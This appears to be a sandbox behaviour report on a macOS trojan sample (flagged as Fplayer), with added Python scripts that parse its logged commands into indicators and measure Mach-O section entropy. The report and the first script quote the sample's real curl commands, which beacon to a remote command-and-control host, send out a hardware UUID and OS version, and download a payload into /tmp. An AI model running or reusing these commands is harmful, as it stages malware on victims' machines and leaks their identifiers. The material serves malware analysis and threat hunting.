Source: malw_sampl |
Virustotal: Detection: 44% |
Source: malw_sampl |
ReversingLabs: Detection: 34% |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.83.196 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.83.196 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
DNS traffic detected: queries for: api.appsreforoma.com |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://crl.apple.com/codesigning.crl0 |
Source: malw_sampl |
String found in binary or memory: http://crl.apple.com/root.crl0 |
Source: malw_sampl |
String found in binary or memory: http://crl.apple.com/timestamp.crl0 |
Source: malw_sampl |
String found in binary or memory: http://ocsp.apple.com/ocsp-devid010 |
Source: malw_sampl |
String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://www.apple.com/appleca/root.crl0 |
Source: malw_sampl |
String found in binary or memory: http://www.apple.com/appleca0 |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://www.apple.com/certificateauthority0 |
Source: malw_sampl |
String found in binary or memory: https://www.apple.com/appleca/0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49399 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49403 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49347 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49402 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49401 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49345 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49389 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49388 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49393 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49391 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49388 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49401 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49403 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49352 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49327 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49350 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49399 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49352 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49350 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49393 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49392 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49391 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49390 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49392 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49390 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49389 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49345 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49404 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49402 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49347 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49349 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49349 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49327 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49404 |
Source: malw_sampl, type: SAMPLE |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: malw_sampl, type: SAMPLE |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: classification engine |
Classification label: mal68.mac@0/4@4/0 |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1 |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1 |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1 |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1 |
Source: /bin/sh (PID: 622) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0 |
Source: /bin/sh (PID: 629) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1 |
Source: /bin/sh (PID: 631) |
Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593 |
Source: /bin/sh (PID: 633) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3 |
Source: /bin/sh (PID: 626) |
Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 } |
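The command records above show the sample's full staging sequence: beacon to api.appsreforoma.com with a stage counter (c=0), fingerprint the host (OS version via defaults, hardware UUID via system_profiler | awk), beacon again (c=1), fetch a payload into /tmp/<UUID>/<UUID> with curl -f0L (fail silently, HTTP/1.0, follow redirects), then beacon c=3. Every request discards its output (> /dev/null 2>&1). The script below is an added example, not part of the sandbox report or of the sample: it parses those "Shell command executed" lines (embedded verbatim as constructed input), pulls out the C2 host, the beacon stage sequence, the identifiers leaked in the query string, the drop path, and base64-decodes any query value that looks encoded. The regexes, the RECON_COMMANDS list and the "silent beacon" heuristic (curl with output discarded and no -o target) are my assumptions, chosen to fit this report.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed input: the "Shell command executed" records for PID 620 from the
# report, copied verbatim. In practice these come from the sandbox's JSON
# export or from EDR process-creation telemetry.
REPORT_LINES = [
    "Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1",
    "Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion",
    "Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }'",
    "Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1",
    "Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1",
    "Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1",
]

# Assumed patterns (my choice, tuned to this report's command shapes).
URL_RE = re.compile(r"'(https?://[^']+)'")
OUTFILE_RE = re.compile(r"\s-o\s+(\S+)")
UUID_RE = re.compile(r"^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Host-fingerprinting commands seen in the report; the hardware UUID they
# yield is the "s=" value carried in every beacon.
RECON_COMMANDS = (
    "system_profiler SPHardwareDataType",
    "defaults read /System/Library/CoreServices/SystemVersion.plist",
)


def parse_curl(cmd):
    """Describe one curl invocation: host, path, query params, -o target, output discarded?"""
    m = URL_RE.search(cmd) if "curl " in cmd else None
    if not m:
        return None
    url = urlparse(m.group(1))
    out = OUTFILE_RE.search(cmd)
    return {
        "host": url.hostname,
        "path": url.path,
        "params": {k: v[0] for k, v in parse_qs(url.query).items()},
        "outfile": out.group(1) if out else None,
        "silenced": "> /dev/null" in cmd,
    }


def maybe_b64(value):
    """Decode a query value if it is well-formed base64 and not a plain number."""
    if value.isdigit() or len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None


def triage(lines):
    """Reduce the command records to IOCs: C2 hosts, beacon stage sequence,
    identifiers leaked, payload drop paths, decoded query values."""
    s = {"hosts": set(), "beacon_stages": [], "ids": {}, "recon": [],
         "drops": [], "decoded": {}, "silent_beacons": 0}
    for line in lines:
        cmd = line.split("Shell command executed: ", 1)[-1]
        s["recon"].extend(n for n in RECON_COMMANDS if n in cmd)
        c = parse_curl(cmd)
        if c is None:
            continue
        s["hosts"].add(c["host"])
        p = c["params"]
        if c["path"] == "/slg" and p.get("c", "").isdigit():
            s["beacon_stages"].append(int(p["c"]))
        for key in ("s", "u"):
            if UUID_RE.match(p.get(key, "")):
                s["ids"][key] = p[key]
        if "o" in p:
            s["ids"]["os_version"] = p["o"]
        if c["outfile"]:
            s["drops"].append(c["outfile"])
        elif c["silenced"]:
            s["silent_beacons"] += 1  # fire-and-forget check-in, nothing kept
        for k, v in p.items():
            raw = maybe_b64(v)
            if raw is not None:
                s["decoded"][f"{c['path']}?{k}"] = raw
    return s


if __name__ == "__main__":
    for k, v in triage(REPORT_LINES).items():
        print(f"{k}: {v}")
```

Run as-is it reports a single C2 host, the stage sequence [0, 1, 3] (stage 2 is never sent, which suggests the skipped counter marks a step that ran without a beacon or failed), two UUID identifiers plus the OS version, the /tmp drop path, and the c= value of the /sd/ request decoding to the bytes 00 61 72 6d ("\x00arm"). The "s=" value equals the directory name under /tmp, so a hunting query can join the network beacon to the file drop on the same hardware UUID.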
Source: submission: malw_sampl |
Mach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices |
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651) |
Random device file read: /dev/random |
Source: submission |
CodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl |
Source: malw_sampl |
Submission file: section __const with 7.40356224 entropy (max. 8.0) |
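The 7.40-bit entropy the sandbox reports for __const (out of a maximum of 8.0) is the kind of figure that points at packed, compressed or encrypted data in a section that should normally hold plain constants and strings. The block below is an added example, not part of the report or of any tool it names: it walks the load commands of a 64-bit little-endian Mach-O with struct alone, computes Shannon entropy per section, and flags sections above a threshold. The build_macho helper constructs a minimal test image in memory so the code runs offline; the 7.0 threshold, the LC_SEGMENT_64 and S_ZEROFILL constants are the standard Mach-O values, and everything else is my own construction. Fat (0xCAFEBABE) and 32-bit images are rejected rather than parsed.

```python
import math
import struct
from collections import Counter

MH_MAGIC_64 = 0xFEEDFACF
LC_SEGMENT_64 = 0x19
S_ZEROFILL = 0x1                      # section type: no bytes in the file
HEADER_FMT = "<IiiIIIII"              # mach_header_64 (32 bytes)
SEGMENT_FMT = "<II16sQQQQiiII"        # segment_command_64 (72 bytes)
SECTION_FMT = "<16s16sQQIIIIIIII"     # section_64 (80 bytes)


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_entropies(blob):
    """Return [(segment, section, entropy)] for every section of a 64-bit LE Mach-O."""
    header = struct.unpack_from(HEADER_FMT, blob, 0)
    if header[0] != MH_MAGIC_64:
        raise ValueError("not a 64-bit little-endian Mach-O (fat and 32-bit images unsupported)")
    ncmds = header[4]
    off = struct.calcsize(HEADER_FMT)
    results = []
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", blob, off)
        if cmd == LC_SEGMENT_64:
            seg = struct.unpack_from(SEGMENT_FMT, blob, off)
            segname, nsects = seg[2].rstrip(b"\0").decode(), seg[9]
            sect_off = off + struct.calcsize(SEGMENT_FMT)
            for _ in range(nsects):
                s = struct.unpack_from(SECTION_FMT, blob, sect_off)
                sectname, size, fileoff, flags = s[0].rstrip(b"\0").decode(), s[3], s[4], s[8]
                data = b"" if flags & 0xFF == S_ZEROFILL else blob[fileoff:fileoff + size]
                results.append((segname, sectname, shannon_entropy(data)))
                sect_off += struct.calcsize(SECTION_FMT)
        off += cmdsize
    return results


def high_entropy_sections(blob, threshold=7.0):
    """Sections whose byte distribution is close to uniform; 7.0 is a heuristic cut-off."""
    return [(seg, sect, e) for seg, sect, e in section_entropies(blob) if e >= threshold]


def build_macho(sections):
    """Constructed test input: a minimal MH_EXECUTE image with one __TEXT segment
    holding the given (name, bytes) sections laid out back to back after the headers."""
    hdr_size, seg_size, sec_size = (struct.calcsize(f) for f in (HEADER_FMT, SEGMENT_FMT, SECTION_FMT))
    data_off = hdr_size + seg_size + sec_size * len(sections)
    body, sect_hdrs = b"", b""
    for name, data in sections:
        sect_hdrs += struct.pack(SECTION_FMT, name.encode(), b"__TEXT", 0, len(data),
                                 data_off + len(body), 0, 0, 0, 0, 0, 0, 0)
        body += data
    seg = struct.pack(SEGMENT_FMT, LC_SEGMENT_64, seg_size + len(sect_hdrs), b"__TEXT",
                      0, len(body), 0, data_off + len(body), 7, 5, len(sections), 0)
    hdr = struct.pack(HEADER_FMT, MH_MAGIC_64, 0x01000007, 3, 2, 1, len(seg) + len(sect_hdrs), 0, 0)
    return hdr + seg + sect_hdrs + body


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        for seg, sect, e in section_entropies(f.read()):
            print(f"{seg}/{sect}: {e:.3f}")
```

Pointed at a real x86_64 Mach-O it prints one entropy per section; compare __const or __data against __text (native code usually sits around 5 to 6.5 bits) rather than against a fixed number, since a large, legitimately compressed resource table will also score high. A match on this check alone is a lead for where the decryption routine reads from, not a verdict.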
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.model (6.2) |
Source: /bin/sh (PID: 623) |
Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.cpu_freq (6.15) |
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.memsize (6.24) |
Source: /bin/sh (PID: 621) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 623) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 624) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 628) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 630) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 632) |
Sysctl requested: kern.hostname (1.10) |
Source: /bin/sh (PID: 625) |
System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType |
Source: /usr/sbin/system_profiler (PID: 625) |
System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full |